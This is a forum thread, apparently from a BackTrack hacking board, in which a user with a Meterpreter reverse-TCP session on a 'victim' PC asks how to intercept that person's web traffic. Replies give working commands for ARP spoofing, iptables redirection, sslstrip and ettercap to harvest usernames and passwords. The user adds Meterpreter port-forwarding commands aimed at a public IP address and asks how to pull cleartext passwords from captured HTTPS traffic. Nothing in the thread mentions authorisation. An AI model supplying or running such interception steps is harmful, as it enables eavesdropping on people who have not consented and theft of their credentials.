Results 1 to 10 of 10

Thread: Reverse TCP, Ettercap, DNS Spoof

Hybrid View

  1. #1
    Just burned their ISO
    Join Date
    Jan 2013
    Posts
    11

    Question Reverse TCP, Ettercap, DNS Spoof

    Hello guys,
    Here is my question.
    I'm connected via a metersploit's payload (reverse tcp) to my victim's pc. Everything working well.
    And i would to know if there's a way to capture internet datas from victim via the metasploit connection.
    I mean, if i start ettercap and do a MITM between my attacker's pc and my victim's one, i'll only see the meterpreter datas sent, nothing with internet browsing etc (from victim)
    So is something like this i can do with tcp reverse, or am i supposed to use another payload ?

    Thanks for reading me

  2. #2
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    How is your MITM attack setup, please show your method.

  3. #3
    Just burned their ISO
    Join Date
    Jan 2013
    Posts
    11

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    Hello Jimmy87.

    Here is the whole attack setup:


    Here we can see that payload and meterpreter are connected:


    So now what i'd like to do, is using the meterpreter's tunnel to run ettercap on the remote network.
    Like if would have a tunneled local network (as Hamachi does), so i could see the victim and his gateway in ettercap hosts list.
    Kinda like this :


    Do you think it's possible to go through the meterpreter tunnel to do this, or have i to find another way ?

  4. #4
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    So I think you should try this maybe,

    edit etter.conf and uncomment the redir_command_off & redir_command_on within the linux section

    Code:
    kate /etc/etter.conf
    Then enable IP forwarding;

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    Use arpspoof between the Victim and the Default gateway e.g.

    Code:
    arpspoof -i wlan0/eth0 (your interface) -t (192.168.1.11 - victim IP) (192.168.1.1 - Default GW IP)
    You could then use IP tables to redirect some port 80 traffic if you wanted web traffic, the reason for the uncomment in step 1...e.g.

    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    You could then use sslstrip and ettercap (sslstrip to strip the ssl connection and ettercap to get UN and PW - if that's what you wanted)

    Code:
    sslstrip -a -k -f
    ettercap -T -q -i (your interface)
    After rereading the post, I'm wondering if you need to use this instead of arpspoof command. But I'm still not sure if this will work! (the above would be ok on the same LAN)

    Code:
    ettercap -T -M arp:remote
    Last edited by Jimmy87; 02-01-2013 at 05:04 PM.

  5. #5
    Just burned their ISO
    Join Date
    Jan 2013
    Posts
    11

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    I still can't see the victim's computer in Ettercap.

    #Payload and meterpreter are connected

    #Here is the part of my etter.conf :
    Code:
    #---------------
    #     Linux 
    #---------------
    
    # if you use ipchains:
       redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
       redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
    
    # if you use iptables:
       redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
       redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT
    #The ip_forward activation command didn't work
    Code:
    root@bt:~# cat /proc/sys/net/ipv4/ip_forward
    0
    So i edited: "/etc/sysctl.conf" and uncommented the following line :
    Code:
    # Uncomment the next line to enable packet forwarding for IPv4
    #net.ipv4.ip_forward=1
    And i entered your command back, which successfully worked this time.
    So ipforward owes 1 now.

    Your iptable commands were wrong (at least, it's what iptables told :l) i looked on the internet and entered this :
    Code:
    iptables -t nat -A PREROUTING --dst 192.168.1.11 -p tcp --dport 80 -j REDIRECT --to-ports 10000
    And i've seen your edit, so i tried :
    Code:
    root@bt:~# ettercap -T -M arp:remote
    
    ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA
    
    Listening on eth0... (Ethernet)
    
      eth0 ->       08:00:27:0B:1E:04       192.168.1.6     255.255.255.0
    
    SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
    Privileges dropped to UID 65534 GID 65534...
    
    etter.dns:1 Invalid ip address
    etter.dns:2 Invalid ip address
    etter.dns:3 Invalid ip address
      28 plugins
      40 protocol dissectors
      55 ports monitored
    7587 mac vendor fingerprint
    1766 tcp OS fingerprint
    2183 known services
    
    
    FATAL: ARP poisoning needs a non empty hosts list.
    So itried to see my host list with "L" bind :
    It's all blank.

    Then i tried to see the profiles list with "O" bind, then "R" to see the remote_hosts :
    No cillected Profile !!

    So i tried the "S" bind to select a specific host :
    Code:
    ==================================================
    
     1)     192.168.1.1   
     2)     192.168.1.2   
     3)     192.168.1.6   
    Select an host to display (0 for all, -1 to quit): 0
    I tried to capture anyway, but i got nothing, when i opened a web page with my victim's computer, nothing was showing up on ettercap (i ran it without quiet mode)

    And btw, sslstrip is an unknown command via the console, i'll find how to start it on BT5 =)

    Thanks for your help =) and tell me if i did something wrong

  6. #6
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    Weird the ip_forward command works for me.

    To get sslstrip running try;
    Code:
    cd /pentest/web/sslstrip
    python setup.py install
    I'm not really sure what else to suggest sorry, I can't get my head round how you'd be the man in the middle in this setup!

  7. #7
    Just burned their ISO
    Join Date
    Jan 2013
    Posts
    11

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    Thanks for your help anyway!
    I think i'm gonna learn more about meterpreter, because i've seen this recently :

    It seems it supports port forwarding in itself, i'll search how to make it work

  8. #8
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    Ok good luck with it, post back any findings!

  9. #9
    Just burned their ISO
    Join Date
    Jan 2013
    Posts
    11

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    Ok, even with portfowarding i couldn't redirect packets going through victim's ports 80 & 443 through 43443 and 43444 of mine. (Ports open in my router btw). I've read multiple things about this, It seems that ppl only use it to make a Pivot. Anyway, here is the syntax, and the command in entered :
    Code:
    Syntax:
    portfwd add –l 3389 –p 3389 –r < target host >
    
    “add” will add the port forwarding to the list, and will essentially create a tunnel for us. Please note, this tunnel will also exist outside the Metasploit console. Making it available to any terminal session.
    “-l 3389” is the local port that will be listening and forwarded to our target.
    This can be any port on your machine, as long as it’s not already being used.
    
    “-p 3389” is the destination port on our targeting host.
    
    “-r <target host>” is the our targeted system’s IP or hostname.
    According to this, i entered the following commands :
    Code:
    meterpreter > portfwd add -l 43443 -p 80 -r 37.160.50.174
    [*] Local TCP relay created: 0.0.0.0:43443 <-> 37.160.***.***:80
    meterpreter > portfwd add -l 43444 -p 443 -r 37.160.50.174
    [*] Local TCP relay created: 0.0.0.0:43444 <-> 37.160.***.***:443
    But still, when i'm capturing with wireshark, i only get datas from meterpreter, nothing about http packets from my victim.


    I learn about how to sniff packets from the victim, with an extension called "sniffer", but if i save the pcap files, is there a way to get clear text password with them ? (if https is used)

  10. #10
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Default Re: Reverse TCP, Ettercap, DNS Spoof

    Yeah I think you're right, I did have a look at Metasploit Unleashed and read a bit about it, I'm guessing you read the same stuff;
    http://www.offensive-security.com/me...ashed/Pivoting

    I'm not sure if this can help you with your pcap request, take a look if you haven't already seen this;
    http://segfault.in/2010/11/decrypt-h...-and-key-file/

Similar Threads

  1. Replies: 5
    Last Post: 04-03-2011, 01:54 PM
  2. DNS Spoof With Ettercap :)
    By killer-souls in forum BackTrack Videos
    Replies: 0
    Last Post: 12-20-2010, 02:24 PM
  3. [Video]MS10-046 Metasploit + ettercap DNS Spoof
    By g3ksan in forum BackTrack Videos
    Replies: 2
    Last Post: 08-23-2010, 09:44 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •